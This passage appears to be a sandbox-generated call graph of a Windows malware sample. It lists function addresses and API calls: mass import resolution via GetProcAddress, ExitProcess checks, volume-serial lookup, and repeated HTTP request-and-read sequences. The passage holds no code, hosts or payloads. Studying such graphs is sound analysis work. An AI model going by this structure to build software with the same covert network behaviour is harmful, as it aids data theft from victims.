13660->13661 13662 5245c0 2 API calls 13661->13662 13663 522e39 13662->13663 13664 5245c0 2 API calls 13663->13664 13665 522e52 13664->13665 13666 5245c0 2 API calls 13665->13666 13667 522e6b 13666->13667 13668 5245c0 2 API calls 13667->13668 13669 522e84 13668->13669 13670 5245c0 2 API calls 13669->13670 13671 522e9d 13670->13671 13672 5245c0 2 API calls 13671->13672 13673 522eb6 13672->13673 13674 5245c0 2 API calls 13673->13674 13675 522ecf 13674->13675 13676 5245c0 2 API calls 13675->13676 13677 522ee8 13676->13677 13678 5245c0 2 API calls 13677->13678 13679 522f01 13678->13679 13680 5245c0 2 API calls 13679->13680 13681 522f1a 13680->13681 13682 5245c0 2 API calls 13681->13682 13683 522f33 13682->13683 13684 5245c0 2 API calls 13683->13684 13685 522f4c 13684->13685 13686 5245c0 2 API calls 13685->13686 13687 522f65 13686->13687 13688 5245c0 2 API calls 13687->13688 13689 522f7e 13688->13689 13690 5245c0 2 API calls 13689->13690 13691 522f97 13690->13691 13692 5245c0 2 API calls 13691->13692 13693 522fb0 13692->13693 13694 5245c0 2 API calls 13693->13694 13695 522fc9 13694->13695 13696 5245c0 2 API calls 13695->13696 13697 522fe2 13696->13697 13698 5245c0 2 API calls 13697->13698 13699 522ffb 13698->13699 13700 5245c0 2 API calls 13699->13700 13701 523014 13700->13701 13702 5245c0 2 API calls 13701->13702 13703 52302d 13702->13703 13704 5245c0 2 API calls 13703->13704 13705 523046 13704->13705 13706 5245c0 2 API calls 13705->13706 13707 52305f 13706->13707 13708 5245c0 2 API calls 13707->13708 13709 523078 13708->13709 13710 5245c0 2 API calls 13709->13710 13711 523091 13710->13711 13712 5245c0 2 API calls 13711->13712 13713 5230aa 13712->13713 13714 5245c0 2 API calls 13713->13714 13715 5230c3 13714->13715 13716 5245c0 2 API calls 13715->13716 13717 5230dc 13716->13717 13718 5245c0 2 API calls 13717->13718 13719 5230f5 13718->13719 13720 5245c0 2 API calls 13719->13720 13721 52310e 13720->13721 13722 5245c0 2 API calls 13721->13722 13723 523127 13722->13723 13724 5245c0 2 API calls 13723->13724 13725 523140 13724->13725 13726 5245c0 2 API calls 13725->13726 13727 523159 13726->13727 13728 5245c0 2 API calls 13727->13728 13729 523172 13728->13729 13730 5245c0 2 API calls 13729->13730 13731 52318b 13730->13731 13732 5245c0 2 API calls 13731->13732 13733 5231a4 13732->13733 13734 5245c0 2 API calls 13733->13734 13735 5231bd 13734->13735 13736 5245c0 2 API calls 13735->13736 13737 5231d6 13736->13737 13738 5245c0 2 API calls 13737->13738 13739 5231ef 13738->13739 13740 5245c0 2 API calls 13739->13740 13741 523208 13740->13741 13742 5245c0 2 API calls 13741->13742 13743 523221 13742->13743 13744 5245c0 2 API calls 13743->13744 13745 52323a 13744->13745 13746 5245c0 2 API calls 13745->13746 13747 523253 13746->13747 13748 5245c0 2 API calls 13747->13748 13749 52326c 13748->13749 13750 5245c0 2 API calls 13749->13750 13751 523285 13750->13751 13752 5245c0 2 API calls 13751->13752 13753 52329e 13752->13753 13754 5245c0 2 API calls 13753->13754 13755 5232b7 13754->13755 13756 5245c0 2 API calls 13755->13756 13757 5232d0 13756->13757 13758 5245c0 2 API calls 13757->13758 13759 5232e9 13758->13759 13760 5245c0 2 API calls 13759->13760 13761 523302 13760->13761 13762 5245c0 2 API calls 13761->13762 13763 52331b 13762->13763 13764 5245c0 2 API calls 13763->13764 13765 523334 13764->13765 13766 5245c0 2 API calls 13765->13766 13767 52334d 13766->13767 13768 5245c0 2 API calls 13767->13768 13769 523366 13768->13769 13770 5245c0 2 API calls 13769->13770 13771 52337f 13770->13771 13772 5245c0 2 API calls 13771->13772 13773 523398 13772->13773 13774 5245c0 2 API calls 13773->13774 13775 5233b1 13774->13775 13776 5245c0 2 API calls 13775->13776 13777 5233ca 13776->13777 13778 5245c0 2 API calls 13777->13778 13779 5233e3 13778->13779 13780 5245c0 2 API calls 13779->13780 13781 5233fc 13780->13781 13782 5245c0 2 API calls 13781->13782 13783 523415 13782->13783 13784 5245c0 2 API calls 13783->13784 13785 52342e 13784->13785 13786 5245c0 2 API calls 13785->13786 13787 523447 13786->13787 13788 5245c0 2 API calls 13787->13788 13789 523460 13788->13789 13790 5245c0 2 API calls 13789->13790 13791 523479 13790->13791 13792 5245c0 2 API calls 13791->13792 13793 523492 13792->13793 13794 5245c0 2 API calls 13793->13794 13795 5234ab 13794->13795 13796 5245c0 2 API calls 13795->13796 13797 5234c4 13796->13797 13798 5245c0 2 API calls 13797->13798 13799 5234dd 13798->13799 13800 5245c0 2 API calls 13799->13800 13801 5234f6 13800->13801 13802 5245c0 2 API calls 13801->13802 13803 52350f 13802->13803 13804 5245c0 2 API calls 13803->13804 13805 523528 13804->13805 13806 5245c0 2 API calls 13805->13806 13807 523541 13806->13807 13808 5245c0 2 API calls 13807->13808 13809 52355a 13808->13809 13810 5245c0 2 API calls 13809->13810 13811 523573 13810->13811 13812 5245c0 2 API calls 13811->13812 13813 52358c 13812->13813 13814 5245c0 2 API calls 13813->13814 13815 5235a5 13814->13815 13816 5245c0 2 API calls 13815->13816 13817 5235be 13816->13817 13818 5245c0 2 API calls 13817->13818 13819 5235d7 13818->13819 13820 5245c0 2 API calls 13819->13820 13821 5235f0 13820->13821 13822 5245c0 2 API calls 13821->13822 13823 523609 13822->13823 13824 5245c0 2 API calls 13823->13824 13825 523622 13824->13825 13826 5245c0 2 API calls 13825->13826 13827 52363b 13826->13827 13828 5245c0 2 API calls 13827->13828 13829 523654 13828->13829 13830 5245c0 2 API calls 13829->13830 13831 52366d 13830->13831 13832 5245c0 2 API calls 13831->13832 13833 523686 13832->13833 13834 5245c0 2 API calls 13833->13834 13835 52369f 13834->13835 13836 5245c0 2 API calls 13835->13836 13837 5236b8 13836->13837 13838 5245c0 2 API calls 13837->13838 13839 5236d1 13838->13839 13840 5245c0 2 API calls 13839->13840 13841 5236ea 13840->13841 13842 5245c0 2 API calls 13841->13842 13843 523703 13842->13843 13844 5245c0 2 API calls 13843->13844 13845 52371c 13844->13845 13846 5245c0 2 API calls 13845->13846 13847 523735 13846->13847 13848 5245c0 2 API calls 13847->13848 13849 52374e 13848->13849 13850 5245c0 2 API calls 13849->13850 13851 523767 13850->13851 13852 5245c0 2 API calls 13851->13852 13853 523780 13852->13853 13854 5245c0 2 API calls 13853->13854 13855 523799 13854->13855 13856 5245c0 2 API calls 13855->13856 13857 5237b2 13856->13857 13858 5245c0 2 API calls 13857->13858 13859 5237cb 13858->13859 13860 5245c0 2 API calls 13859->13860 13861 5237e4 13860->13861 13862 5245c0 2 API calls 13861->13862 13863 5237fd 13862->13863 13864 5245c0 2 API calls 13863->13864 13865 523816 13864->13865 13866 5245c0 2 API calls 13865->13866 13867 52382f 13866->13867 13868 5245c0 2 API calls 13867->13868 13869 523848 13868->13869 13870 5245c0 2 API calls 13869->13870 13871 523861 13870->13871 13872 5245c0 2 API calls 13871->13872 13873 52387a 13872->13873 13874 5245c0 2 API calls 13873->13874 13875 523893 13874->13875 13876 5245c0 2 API calls 13875->13876 13877 5238ac 13876->13877 13878 5245c0 2 API calls 13877->13878 13879 5238c5 13878->13879 13880 5245c0 2 API calls 13879->13880 13881 5238de 13880->13881 13882 5245c0 2 API calls 13881->13882 13883 5238f7 13882->13883 13884 5245c0 2 API calls 13883->13884 13885 523910 13884->13885 13886 5245c0 2 API calls 13885->13886 13887 523929 13886->13887 13888 5245c0 2 API calls 13887->13888 13889 523942 13888->13889 13890 5245c0 2 API calls 13889->13890 13891 52395b 13890->13891 13892 5245c0 2 API calls 13891->13892 13893 523974 13892->13893 13894 5245c0 2 API calls 13893->13894 13895 52398d 13894->13895 13896 5245c0 2 API calls 13895->13896 13897 5239a6 13896->13897 13898 5245c0 2 API calls 13897->13898 13899 5239bf 13898->13899 13900 5245c0 2 API calls 13899->13900 13901 5239d8 13900->13901 13902 5245c0 2 API calls 13901->13902 13903 5239f1 13902->13903 13904 5245c0 2 API calls 13903->13904 13905 523a0a 13904->13905 13906 5245c0 2 API calls 13905->13906 13907 523a23 13906->13907 13908 5245c0 2 API calls 13907->13908 13909 523a3c 13908->13909 13910 5245c0 2 API calls 13909->13910 13911 523a55 13910->13911 13912 5245c0 2 API calls 13911->13912 13913 523a6e 13912->13913 13914 5245c0 2 API calls 13913->13914 13915 523a87 13914->13915 13916 5245c0 2 API calls 13915->13916 13917 523aa0 13916->13917 13918 5245c0 2 API calls 13917->13918 13919 523ab9 13918->13919 13920 5245c0 2 API calls 13919->13920 13921 523ad2 13920->13921 13922 5245c0 2 API calls 13921->13922 13923 523aeb 13922->13923 13924 5245c0 2 API calls 13923->13924 13925 523b04 13924->13925 13926 5245c0 2 API calls 13925->13926 13927 523b1d 13926->13927 13928 5245c0 2 API calls 13927->13928 13929 523b36 13928->13929 13930 5245c0 2 API calls 13929->13930 13931 523b4f 13930->13931 13932 5245c0 2 API calls 13931->13932 13933 523b68 13932->13933 13934 5245c0 2 API calls 13933->13934 13935 523b81 13934->13935 13936 5245c0 2 API calls 13935->13936 13937 523b9a 13936->13937 13938 5245c0 2 API calls 13937->13938 13939 523bb3 13938->13939 13940 5245c0 2 API calls 13939->13940 13941 523bcc 13940->13941 13942 5245c0 2 API calls 13941->13942 13943 523be5 13942->13943 13944 5245c0 2 API calls 13943->13944 13945 523bfe 13944->13945 13946 5245c0 2 API calls 13945->13946 13947 523c17 13946->13947 13948 5245c0 2 API calls 13947->13948 13949 523c30 13948->13949 13950 5245c0 2 API calls 13949->13950 13951 523c49 13950->13951 13952 5245c0 2 API calls 13951->13952 13953 523c62 13952->13953 13954 5245c0 2 API calls 13953->13954 13955 523c7b 13954->13955 13956 5245c0 2 API calls 13955->13956 13957 523c94 13956->13957 13958 5245c0 2 API calls 13957->13958 13959 523cad 13958->13959 13960 5245c0 2 API calls 13959->13960 13961 523cc6 13960->13961 13962 5245c0 2 API calls 13961->13962 13963 523cdf 13962->13963 13964 5245c0 2 API calls 13963->13964 13965 523cf8 13964->13965 13966 5245c0 2 API calls 13965->13966 13967 523d11 13966->13967 13968 5245c0 2 API calls 13967->13968 13969 523d2a 13968->13969 13970 5245c0 2 API calls 13969->13970 13971 523d43 13970->13971 13972 5245c0 2 API calls 13971->13972 13973 523d5c 13972->13973 13974 5245c0 2 API calls 13973->13974 13975 523d75 13974->13975 13976 5245c0 2 API calls 13975->13976 13977 523d8e 13976->13977 13978 5245c0 2 API calls 13977->13978 13979 523da7 13978->13979 13980 5245c0 2 API calls 13979->13980 13981 523dc0 13980->13981 13982 5245c0 2 API calls 13981->13982 13983 523dd9 13982->13983 13984 5245c0 2 API calls 13983->13984 13985 523df2 13984->13985 13986 5245c0 2 API calls 13985->13986 13987 523e0b 13986->13987 13988 5245c0 2 API calls 13987->13988 13989 523e24 13988->13989 13990 5245c0 2 API calls 13989->13990 13991 523e3d 13990->13991 13992 5245c0 2 API calls 13991->13992 13993 523e56 13992->13993 13994 5245c0 2 API calls 13993->13994 13995 523e6f 13994->13995 13996 5245c0 2 API calls 13995->13996 13997 523e88 13996->13997 13998 5245c0 2 API calls 13997->13998 13999 523ea1 13998->13999 14000 5245c0 2 API calls 13999->14000 14001 523eba 14000->14001 14002 5245c0 2 API calls 14001->14002 14003 523ed3 14002->14003 14004 5245c0 2 API calls 14003->14004 14005 523eec 14004->14005 14006 5245c0 2 API calls 14005->14006 14007 523f05 14006->14007 14008 5245c0 2 API calls 14007->14008 14009 523f1e 14008->14009 14010 5245c0 2 API calls 14009->14010 14011 523f37 14010->14011 14012 5245c0 2 API calls 14011->14012 14013 523f50 14012->14013 14014 5245c0 2 API calls 14013->14014 14015 523f69 14014->14015 14016 5245c0 2 API calls 14015->14016 14017 523f82 14016->14017 14018 5245c0 2 API calls 14017->14018 14019 523f9b 14018->14019 14020 5245c0 2 API calls 14019->14020 14021 523fb4 14020->14021 14022 5245c0 2 API calls 14021->14022 14023 523fcd 14022->14023 14024 5245c0 2 API calls 14023->14024 14025 523fe6 14024->14025 14026 5245c0 2 API calls 14025->14026 14027 523fff 14026->14027 14028 5245c0 2 API calls 14027->14028 14029 524018 14028->14029 14030 5245c0 2 API calls 14029->14030 14031 524031 14030->14031 14032 5245c0 2 API calls 14031->14032 14033 52404a 14032->14033 14034 5245c0 2 API calls 14033->14034 14035 524063 14034->14035 14036 5245c0 2 API calls 14035->14036 14037 52407c 14036->14037 14038 5245c0 2 API calls 14037->14038 14039 524095 14038->14039 14040 5245c0 2 API calls 14039->14040 14041 5240ae 14040->14041 14042 5245c0 2 API calls 14041->14042 14043 5240c7 14042->14043 14044 5245c0 2 API calls 14043->14044 14045 5240e0 14044->14045 14046 5245c0 2 API calls 14045->14046 14047 5240f9 14046->14047 14048 5245c0 2 API calls 14047->14048 14049 524112 14048->14049 14050 5245c0 2 API calls 14049->14050 14051 52412b 14050->14051 14052 5245c0 2 API calls 14051->14052 14053 524144 14052->14053 14054 5245c0 2 API calls 14053->14054 14055 52415d 14054->14055 14056 5245c0 2 API calls 14055->14056 14057 524176 14056->14057 14058 5245c0 2 API calls 14057->14058 14059 52418f 14058->14059 14060 5245c0 2 API calls 14059->14060 14061 5241a8 14060->14061 14062 5245c0 2 API calls 14061->14062 14063 5241c1 14062->14063 14064 5245c0 2 API calls 14063->14064 14065 5241da 14064->14065 14066 5245c0 2 API calls 14065->14066 14067 5241f3 14066->14067 14068 5245c0 2 API calls 14067->14068 14069 52420c 14068->14069 14070 5245c0 2 API calls 14069->14070 14071 524225 14070->14071 14072 5245c0 2 API calls 14071->14072 14073 52423e 14072->14073 14074 5245c0 2 API calls 14073->14074 14075 524257 14074->14075 14076 5245c0 2 API calls 14075->14076 14077 524270 14076->14077 14078 5245c0 2 API calls 14077->14078 14079 524289 14078->14079 14080 5245c0 2 API calls 14079->14080 14081 5242a2 14080->14081 14082 5245c0 2 API calls 14081->14082 14083 5242bb 14082->14083 14084 5245c0 2 API calls 14083->14084 14085 5242d4 14084->14085 14086 5245c0 2 API calls 14085->14086 14087 5242ed 14086->14087 14088 5245c0 2 API calls 14087->14088 14089 524306 14088->14089 14090 5245c0 2 API calls 14089->14090 14091 52431f 14090->14091 14092 5245c0 2 API calls 14091->14092 14093 524338 14092->14093 14094 5245c0 2 API calls 14093->14094 14095 524351 14094->14095 14096 5245c0 2 API calls 14095->14096 14097 52436a 14096->14097 14098 5245c0 2 API calls 14097->14098 14099 524383 14098->14099 14100 5245c0 2 API calls 14099->14100 14101 52439c 14100->14101 14102 5245c0 2 API calls 14101->14102 14103 5243b5 14102->14103 14104 5245c0 2 API calls 14103->14104 14105 5243ce 14104->14105 14106 5245c0 2 API calls 14105->14106 14107 5243e7 14106->14107 14108 5245c0 2 API calls 14107->14108 14109 524400 14108->14109 14110 5245c0 2 API calls 14109->14110 14111 524419 14110->14111 14112 5245c0 2 API calls 14111->14112 14113 524432 14112->14113 14114 5245c0 2 API calls 14113->14114 14115 52444b 14114->14115 14116 5245c0 2 API calls 14115->14116 14117 524464 14116->14117 14118 5245c0 2 API calls 14117->14118 14119 52447d 14118->14119 14120 5245c0 2 API calls 14119->14120 14121 524496 14120->14121 14122 5245c0 2 API calls 14121->14122 14123 5244af 14122->14123 14124 5245c0 2 API calls 14123->14124 14125 5244c8 14124->14125 14126 5245c0 2 API calls 14125->14126 14127 5244e1 14126->14127 14128 5245c0 2 API calls 14127->14128 14129 5244fa 14128->14129 14130 5245c0 2 API calls 14129->14130 14131 524513 14130->14131 14132 5245c0 2 API calls 14131->14132 14133 52452c 14132->14133 14134 5245c0 2 API calls 14133->14134 14135 524545 14134->14135 14136 5245c0 2 API calls 14135->14136 14137 52455e 14136->14137 14138 5245c0 2 API calls 14137->14138 14139 524577 14138->14139 14140 5245c0 2 API calls 14139->14140 14141 524590 14140->14141 14142 5245c0 2 API calls 14141->14142 14143 5245a9 14142->14143 14144 539c10 14143->14144 14145 539c20 43 API calls 14144->14145 14146 53a036 8 API calls 14144->14146 14145->14146 14147 53a146 14146->14147 14148 53a0cc GetProcAddress GetProcAddress GetProcAddress GetProcAddress GetProcAddress 14146->14148 14149 53a153 8 API calls 14147->14149 14150 53a216 14147->14150 14148->14147 14149->14150 14151 53a298 14150->14151 14152 53a21f GetProcAddress GetProcAddress GetProcAddress GetProcAddress GetProcAddress 14150->14152 14153 53a337 14151->14153 14154 53a2a5 6 API calls 14151->14154 14152->14151 14155 53a344 9 API calls 14153->14155 14156 53a41f 14153->14156 14154->14153 14155->14156 14157 53a4a2 14156->14157 14158 53a428 GetProcAddress GetProcAddress GetProcAddress GetProcAddress GetProcAddress 14156->14158 14159 53a4ab GetProcAddress GetProcAddress 14157->14159 14160 53a4dc 14157->14160 14158->14157 14159->14160 14161 53a515 14160->14161 14162 53a4e5 GetProcAddress GetProcAddress 14160->14162 14163 53a612 14161->14163 14164 53a522 10 API calls 14161->14164 14162->14161 14165 53a61b GetProcAddress GetProcAddress GetProcAddress GetProcAddress 14163->14165 14166 53a67d 14163->14166 14164->14163 14165->14166 14167 53a686 GetProcAddress 14166->14167 14168 53a69e 14166->14168 14167->14168 14169 53a6a7 GetProcAddress GetProcAddress GetProcAddress GetProcAddress 14168->14169 14170 535ca3 14168->14170 14169->14170 14171 521590 14170->14171 15292 521670 14171->15292 14174 53a7a0 lstrcpy 14175 5215b5 14174->14175 14176 53a7a0 lstrcpy 14175->14176 14177 5215c7 14176->14177 14178 53a7a0 lstrcpy 14177->14178 14179 5215d9 14178->14179 14180 53a7a0 lstrcpy 14179->14180 14181 521663 14180->14181 14182 535510 14181->14182 14183 535521 14182->14183 14184 53a820 2 API calls 14183->14184 14185 53552e 14184->14185 14186 53a820 2 API calls 14185->14186 14187 53553b 14186->14187 14188 53a820 2 API calls 14187->14188 14189 535548 14188->14189 14190 53a740 lstrcpy 14189->14190 14191 535555 14190->14191 14192 53a740 lstrcpy 14191->14192 14193 535562 14192->14193 14194 53a740 lstrcpy 14193->14194 14195 53556f 14194->14195 14196 53a740 lstrcpy 14195->14196 14236 53557c 14196->14236 14197 5351f0 20 API calls 14197->14236 14198 535643 StrCmpCA 14198->14236 14199 5356a0 StrCmpCA 14200 5357dc 14199->14200 14199->14236 14201 53a8a0 lstrcpy 14200->14201 14202 5357e8 14201->14202 14204 53a820 2 API calls 14202->14204 14203 521590 lstrcpy 14203->14236 14207 5357f6 14204->14207 14205 53a740 lstrcpy 14205->14236 14206 53a820 lstrlen lstrcpy 14206->14236 14209 53a820 2 API calls 14207->14209 14208 535856 StrCmpCA 14210 535991 14208->14210 14208->14236 14214 535805 14209->14214 14213 53a8a0 lstrcpy 14210->14213 14211 53a7a0 lstrcpy 14211->14236 14212 53a8a0 lstrcpy 14212->14236 14215 53599d 14213->14215 14216 521670 lstrcpy 14214->14216 14217 53a820 2 API calls 14215->14217 14234 535811 14216->14234 14218 5359ab 14217->14218 14220 53a820 2 API calls 14218->14220 14219 535a0b StrCmpCA 14221 535a16 Sleep 14219->14221 14222 535a28 14219->14222 14223 5359ba 14220->14223 14221->14236 14224 53a8a0 lstrcpy 14222->14224 14225 521670 lstrcpy 14223->14225 14226 535a34 14224->14226 14225->14234 14227 53a820 2 API calls 14226->14227 14228 535a43 14227->14228 14230 53a820 2 API calls 14228->14230 14229 5352c0 25 API calls 14229->14236 14231 535a52 14230->14231 14233 521670 lstrcpy 14231->14233 14232 53578a StrCmpCA 14232->14236 14233->14234 14234->13289 14235 53593f StrCmpCA 14235->14236 14236->14197 14236->14198 14236->14199 14236->14203 14236->14205 14236->14206 14236->14208 14236->14211 14236->14212 14236->14219 14236->14229 14236->14232 14236->14235 14238 537553 GetVolumeInformationA 14237->14238 14239 53754c 14237->14239 14244 537591 14238->14244 14239->14238 14240 5375fc GetProcessHeap RtlAllocateHeap 14241 537619 14240->14241 14242 537628 wsprintfA 14240->14242 14245 53a740 lstrcpy 14241->14245 14243 53a740 lstrcpy 14242->14243 14246 535da7 14243->14246 14244->14240 14245->14246 14246->13310 14248 53a7a0 lstrcpy 14247->14248 14249 524899 14248->14249 15301 5247b0 14249->15301 14251 5248a5 14252 53a740 lstrcpy 14251->14252 14253 5248d7 14252->14253 14254 53a740 lstrcpy 14253->14254 14255 5248e4 14254->14255 14256 53a740 lstrcpy 14255->14256 14257 5248f1 14256->14257 14258 53a740 lstrcpy 14257->14258 14259 5248fe 14258->14259 14260 53a740 lstrcpy 14259->14260 14261 52490b InternetOpenA StrCmpCA 14260->14261 14262 524944 14261->14262 14263 524ecb InternetCloseHandle 14262->14263 15307 538b60 14262->15307 14264 524ee8 14263->14264 15321 529ac0 CryptStringToBinaryA 14264->15321 14266 524963 15315 53a920 14266->15315 14269 524976 14271 53a8a0 lstrcpy 14269->14271 14276 52497f 14271->14276 14272 53a820 2 API calls 14273 524f05 14272->14273 14275 53a9b0 4 API calls 14273->14275 14274 524f27 ctype 14278 53a7a0 lstrcpy 14274->14278 14277 524f1b 14275->14277 14280 53a9b0 4 API calls 14276->14280 14279 53a8a0 lstrcpy 14277->14279 14291 524f57 14278->14291 14279->14274 14281 5249a9 14280->14281 14282 53a8a0 lstrcpy 14281->14282 14283 5249b2 14282->14283 14284 53a9b0 4 API calls 14283->14284 14285 5249d1 14284->14285 14286 53a8a0 lstrcpy 14285->14286 14287 5249da 14286->14287 14288 53a920 3 API calls 14287->14288 14289 5249f8 14288->14289 14290 53a8a0 lstrcpy 14289->14290 14292 524a01 14290->14292 14291->13313 14293 53a9b0 4 API calls 14292->14293 14294 524a20 14293->14294 14295 53a8a0 lstrcpy 14294->14295 14296 524a29 14295->14296 14297 53a9b0 4 API calls 14296->14297 14298 524a48 14297->14298 14299 53a8a0 lstrcpy 14298->14299 14300 524a51 14299->14300 14301 53a9b0 4 API calls 14300->14301 14302 524a7d 14301->14302 14303 53a920 3 API calls 14302->14303 14304 524a84 14303->14304 14305 53a8a0 lstrcpy 14304->14305 14306 524a8d 14305->14306 14307 524aa3 InternetConnectA 14306->14307 14307->14263 14308 524ad3 HttpOpenRequestA 14307->14308 14310 524b28 14308->14310 14311 524ebe InternetCloseHandle 14308->14311 14312 53a9b0 4 API calls 14310->14312 14311->14263 14313 524b3c 14312->14313 14314 53a8a0 lstrcpy 14313->14314 14315 524b45 14314->14315 14316 53a920 3 API calls 14315->14316 14317 524b63 14316->14317 14318 53a8a0 lstrcpy 14317->14318 14319 524b6c 14318->14319 14320 53a9b0 4 API calls 14319->14320 14321 524b8b 14320->14321 14322 53a8a0 lstrcpy 14321->14322 14323 524b94 14322->14323 14324 53a9b0 4 API calls 14323->14324 14325 524bb5 14324->14325 14326 53a8a0 lstrcpy 14325->14326 14327 524bbe 14326->14327 14328 53a9b0 4 API calls 14327->14328 14329 524bde 14328->14329 14330 53a8a0 lstrcpy 14329->14330 14331 524be7 14330->14331 14332 53a9b0 4 API calls 14331->14332 14333 524c06 14332->14333 14334 53a8a0 lstrcpy 14333->14334 14335 524c0f 14334->14335 14336 53a920 3 API calls 14335->14336 14337 524c2d 14336->14337 14338 53a8a0 lstrcpy 14337->14338 14339 524c36 14338->14339 14340 53a9b0 4 API calls 14339->14340 14341 524c55 14340->14341 14342 53a8a0 lstrcpy 14341->14342 14343 524c5e 14342->14343 14344 53a9b0 4 API calls 14343->14344 14345 524c7d 14344->14345 14346 53a8a0 lstrcpy 14345->14346 14347 524c86 14346->14347 14348 53a920 3 API calls 14347->14348 14349 524ca4 14348->14349 14350 53a8a0 lstrcpy 14349->14350 14351 524cad 14350->14351 14352 53a9b0 4 API calls 14351->14352 14353 524ccc 14352->14353 14354 53a8a0 lstrcpy 14353->14354 14355 524cd5 14354->14355 14356 53a9b0 4 API calls 14355->14356 14357 524cf6 14356->14357 14358 53a8a0 lstrcpy 14357->14358 14359 524cff 14358->14359 14360 53a9b0 4 API calls 14359->14360 14361 524d1f 14360->14361 14362 53a8a0 lstrcpy 14361->14362 14363 524d28 14362->14363 14364 53a9b0 4 API calls 14363->14364 14365 524d47 14364->14365 14366 53a8a0 lstrcpy 14365->14366 14367 524d50 14366->14367 14368 53a920 3 API calls 14367->14368 14369 524d6e 14368->14369 14370 53a8a0 lstrcpy 14369->14370 14371 524d77 14370->14371 14372 53a740 lstrcpy 14371->14372 14373 524d92 14372->14373 14374 53a920 3 API calls 14373->14374 14375 524db3 14374->14375 14376 53a920 3 API calls 14375->14376 14377 524dba 14376->14377 14378 53a8a0 lstrcpy 14377->14378 14379 524dc6 14378->14379 14380 524de7 lstrlen 14379->14380 14381 524dfa 14380->14381 14382 524e03 lstrlen 14381->14382 15326 53aad0 14382->15326 14384 524e13 HttpSendRequestA 14385 524e32 InternetReadFile 14384->14385 14386 524e67 InternetCloseHandle 14385->14386 14391 524e5e 14385->14391 14389 53a800 14386->14389 14388 53a9b0 4 API calls 14388->14391 14389->14311 14390 53a8a0 lstrcpy 14390->14391 14391->14385 14391->14386 14391->14388 14391->14390 15328 53aad0 14392->15328 14394 5317c4 StrCmpCA 14395 5317cf ExitProcess 14394->14395 14396 5317d7 14394->14396 14397 531913 StrCmpCA 14396->14397 14398 531932 StrCmpCA 14396->14398 14399 5318f1 StrCmpCA 14396->14399 14400 531951 StrCmpCA 14396->14400 14401 531970 StrCmpCA 14396->14401 14402 53187f StrCmpCA 14396->14402 14403 53185d StrCmpCA 14396->14403 14404 5318cf StrCmpCA 14396->14404 14405 5318ad StrCmpCA 14396->14405 14406 5319c2 14396->14406 14407 53a820 lstrlen lstrcpy 14396->14407 14397->14396 14398->14396 14399->14396 14400->14396 14401->14396 14402->14396 14403->14396 14404->14396 14405->14396 14406->13315 14407->14396 14409 53a7a0 lstrcpy 14408->14409 14410 525979 14409->14410 14411 5247b0 2 API calls 14410->14411 14412 525985 14411->14412 14413 53a740 lstrcpy 14412->14413 14414 5259ba 14413->14414 14415 53a740 lstrcpy 14414->14415 14416 5259c7 14415->14416 14417 53a740 lstrcpy 14416->14417 14418 5259d4 14417->14418 14419 53a740 lstrcpy 14418->14419 14420 5259e1 14419->14420 14421 53a740 lstrcpy 14420->14421 14422 5259ee InternetOpenA StrCmpCA 14421->14422 14423 525a1d 14422->14423 14424 525fc3 InternetCloseHandle 14423->14424 14426 538b60 3 API calls 14423->14426 14425 525fe0 14424->14425 14429 529ac0 4 API calls 14425->14429 14427 525a3c 14426->14427 14428 53a920 3 API calls 14427->14428 14430 525a4f 14428->14430 14431 525fe6 14429->14431 14432 53a8a0 lstrcpy 14430->14432 14433 53a820 2 API calls 14431->14433 14435 52601f ctype 14431->14435 14437 525a58 14432->14437 14434 525ffd 14433->14434 14436 53a9b0 4 API calls 14434->14436 14439 53a7a0 lstrcpy 14435->14439 14438 526013 14436->14438 14441 53a9b0 4 API calls 14437->14441 14440 53a8a0 lstrcpy 14438->14440 14449 52604f 14439->14449 14440->14435 14442 525a82 14441->14442 14443 53a8a0 lstrcpy 14442->14443 14444 525a8b 14443->14444 14445 53a9b0 4 API calls 14444->14445 14446 525aaa 14445->14446 14447 53a8a0 lstrcpy 14446->14447 14448 525ab3 14447->14448 14450 53a920 3 API calls 14448->14450 14449->13321 14451 525ad1 14450->14451 14452 53a8a0 lstrcpy 14451->14452 14453 525ada 14452->14453 14454 53a9b0 4 API calls 14453->14454 14455 525af9 14454->14455 14456 53a8a0 lstrcpy 14455->14456 14457 525b02 14456->14457 14458 53a9b0 4 API calls 14457->14458 14459 525b21 14458->14459 14460 53a8a0 lstrcpy 14459->14460 14461 525b2a 14460->14461 14462 53a9b0 4 API calls 14461->14462 14463 525b56 14462->14463 14464 53a920 3 API calls 14463->14464 14465 525b5d 14464->14465 14466 53a8a0 lstrcpy 14465->14466 14467 525b66 14466->14467 14468 525b7c InternetConnectA 14467->14468 14468->14424 14469 525bac HttpOpenRequestA 14468->14469 14471 525fb6 InternetCloseHandle 14469->14471 14472 525c0b 14469->14472 14471->14424 14473 53a9b0 4 API calls 14472->14473 14474 525c1f 14473->14474 14475 53a8a0 lstrcpy 14474->14475 14476 525c28 14475->14476 14477 53a920 3 API calls 14476->14477 14478 525c46 14477->14478 14479 53a8a0 lstrcpy 14478->14479 14480 525c4f 14479->14480 14481 53a9b0 4 API calls 14480->14481 14482 525c6e 14481->14482 14483 53a8a0 lstrcpy 14482->14483 14484 525c77 14483->14484 14485 53a9b0 4 API calls 14484->14485 14486 525c98 14485->14486 14487 53a8a0 lstrcpy 14486->14487 14488 525ca1 14487->14488 14489 53a9b0 4 API calls 14488->14489 14490 525cc1 14489->14490 14491 53a8a0 lstrcpy 14490->14491 14492 525cca 14491->14492 14493 53a9b0 4 API calls 14492->14493 14494 525ce9 14493->14494 14495 53a8a0 lstrcpy 14494->14495 14496 525cf2 14495->14496 14497 53a920 3 API calls 14496->14497 14498 525d10 14497->14498 14499 53a8a0 lstrcpy 14498->14499 14500 525d19 14499->14500 14501 53a9b0 4 API calls 14500->14501 14502 525d38 14501->14502 14503 53a8a0 lstrcpy 14502->14503 14504 525d41 14503->14504 14505 53a9b0 4 API calls 14504->14505 14506 525d60 14505->14506 14507 53a8a0 lstrcpy 14506->14507 14508 525d69 14507->14508 14509 53a920 3 API calls 14508->14509 14510 525d87 14509->14510 14511 53a8a0 lstrcpy 14510->14511 14512 525d90 14511->14512 14513 53a9b0 4 API calls 14512->14513 14514 525daf 14513->14514 14515 53a8a0 lstrcpy 14514->14515 14516 525db8 14515->14516 14517 53a9b0 4 API calls 14516->14517 14518 525dd9 14517->14518 14519 53a8a0 lstrcpy 14518->14519 14520 525de2 14519->14520 14521 53a9b0 4 API calls 14520->14521 14522 525e02 14521->14522 14523 53a8a0 lstrcpy 14522->14523 14524 525e0b 14523->14524 14525 53a9b0 4 API calls 14524->14525 14526 525e2a 14525->14526 14527 53a8a0 lstrcpy 14526->14527 14528 525e33 14527->14528 14529 53a920 3 